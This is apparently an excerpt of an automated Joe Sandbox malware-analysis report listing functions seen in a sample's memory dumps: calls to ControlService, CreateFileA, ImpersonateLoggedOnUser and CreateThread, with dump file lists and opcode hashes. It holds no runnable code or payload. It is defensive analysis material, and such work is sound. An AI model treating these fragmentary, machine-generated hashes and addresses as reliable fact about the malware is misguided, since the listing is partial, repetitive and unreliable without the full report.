ControlService.ADVAPI32(?,?,?), ref: 04C31580

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: dd6e8210df0cd4a7a091aaa4306fdcba5e5ae205f44a75ca512b7f7be686ba9b
Instruction ID: ea43e210d47dd0d790bdef314639aca49d4f93e18fda5c8fda186e0224e7ae41
Opcode Fuzzy Hash: dd6e8210df0cd4a7a091aaa4306fdcba5e5ae205f44a75ca512b7f7be686ba9b
Instruction Fuzzy Hash: B22100B59002498FDB10CFAAC584AEEFBF4EB49324F14802AE558A7250C778A644CFA5

Function 04C31510 Relevance: 1.6, APIs: 1, Instructions: 54serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(?,?,?), ref: 04C31580

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 510fcb1d48fdbad3bde416a5a8fe17c2dd9745a9a174c862283398e5ff3c9e67
Instruction ID: 6f5a264ba4181ebc2f8be126661396326d875a5b8eed7ac3abc81eaaae2e6c0a
Opcode Fuzzy Hash: 510fcb1d48fdbad3bde416a5a8fe17c2dd9745a9a174c862283398e5ff3c9e67
Instruction Fuzzy Hash: B011E4B5D002499FDB10CF9AC584BDEFBF4FB49320F148029E559A7250D778A644CFA5

Function 0054FBEE Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c142226a1b882eadcc3a22b4e4d70b618d985ad83fee49fd33895b044b83956
Instruction ID: b56d017c2b31cf09844fe7f5044cb37bbccd1a086e42c18a8b1b195e5380705d
Opcode Fuzzy Hash: 7c142226a1b882eadcc3a22b4e4d70b618d985ad83fee49fd33895b044b83956
Instruction Fuzzy Hash: D0F0C8B71881276CF3068A44ADB5DFF2B1CE681638B308C3EE802CB582D6404E0952B0

Function 04C31301 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 04C31367

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 9b39f2a45affe3f9a8e353e257ece039620b6fec503d97df381d15ec0c4a4ba1
Instruction ID: 7ca1805e5aaf807b13309c112f6ff85a9059031f37be177e83dd93bfdc6e7fdd
Opcode Fuzzy Hash: 9b39f2a45affe3f9a8e353e257ece039620b6fec503d97df381d15ec0c4a4ba1
Instruction Fuzzy Hash: 8A1125B1800249CFDB10DF9AC445BEEFBF4EF49324F24846AD558A7250D778A684CFA5

Function 0054F998 Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,C752CC9F,00000003,00000000), ref: 0054FA01

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 79128f7813de67944d707dc020e31eed2eb5deaa98410c55b5946cd4701a253a
Instruction ID: 148eddc41db9de9d74908b14a9100769301305ddaccb2f27d5ff2d3b9c8e503d
Opcode Fuzzy Hash: 79128f7813de67944d707dc020e31eed2eb5deaa98410c55b5946cd4701a253a
Instruction Fuzzy Hash: 75F082BF2882617CF201C5592E54AF6AB2EF5C2734B31843BF90287542D3945A4E2171

Function 04C31308 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 04C31367

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 4a5ba149675416431e33a2621f5239a7f001de8a42c0f8d4aa2afb36937bd714
Instruction ID: 1606932993facd16406285d112f1492ef989b196f720ad70bf98e3a96921d55d
Opcode Fuzzy Hash: 4a5ba149675416431e33a2621f5239a7f001de8a42c0f8d4aa2afb36937bd714
Instruction Fuzzy Hash: 1A1148B1800249CFDB10CF9AC445BEEFBF8EF49320F24841AD558A3240C778A544CFA5

Function 0054FD4C Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,B4FA4026,00000003), ref: 0054FDBB

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 065647b7525b7df1ec7e13bb50e1b4f725d9a74db1b3cdecec8a20cb332d2bd8
Instruction ID: c1ff3a572efff69a797aef368a3d1eda4de7ca8d94de3b747faa1c50e8c182e7
Opcode Fuzzy Hash: 065647b7525b7df1ec7e13bb50e1b4f725d9a74db1b3cdecec8a20cb332d2bd8
Instruction Fuzzy Hash: F9F096B76481266DF605CE445E14EFF6B6CE7C1738F30883BF401C2446D2405E0A2635

Function 0054F9AF Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,C752CC9F,00000003,00000000), ref: 0054FA01

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3423949ac74c4f341068f0842455dafbbad18c849a584932e7b3765b6b912e10
Instruction ID: 5265157417cc8743352c0279dc506d4c1d47f45cdde3fa3529c327cd87e21a88
Opcode Fuzzy Hash: 3423949ac74c4f341068f0842455dafbbad18c849a584932e7b3765b6b912e10
Instruction Fuzzy Hash: 0AF0E9BB18C2D13DE20286241EA4BF57F3DE9C32307388569F89186183D284460E7631

Function 0054FBCB Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2b48f5811b14e83cf986e1367e33e8ed1d3b70018b82fe5b5ad91a061191afe
Instruction ID: 405cef3d689cdc4e13f8cbb9ae181d51219ab2387583c0f0530b092521802a72
Opcode Fuzzy Hash: e2b48f5811b14e83cf986e1367e33e8ed1d3b70018b82fe5b5ad91a061191afe
Instruction Fuzzy Hash: 91F082F758812B7DF7068E8869B59FE6B5CE681638B308C3AFC52CB542E6904E095270

Function 00586129 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00586138

Memory Dump Source

Source File: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
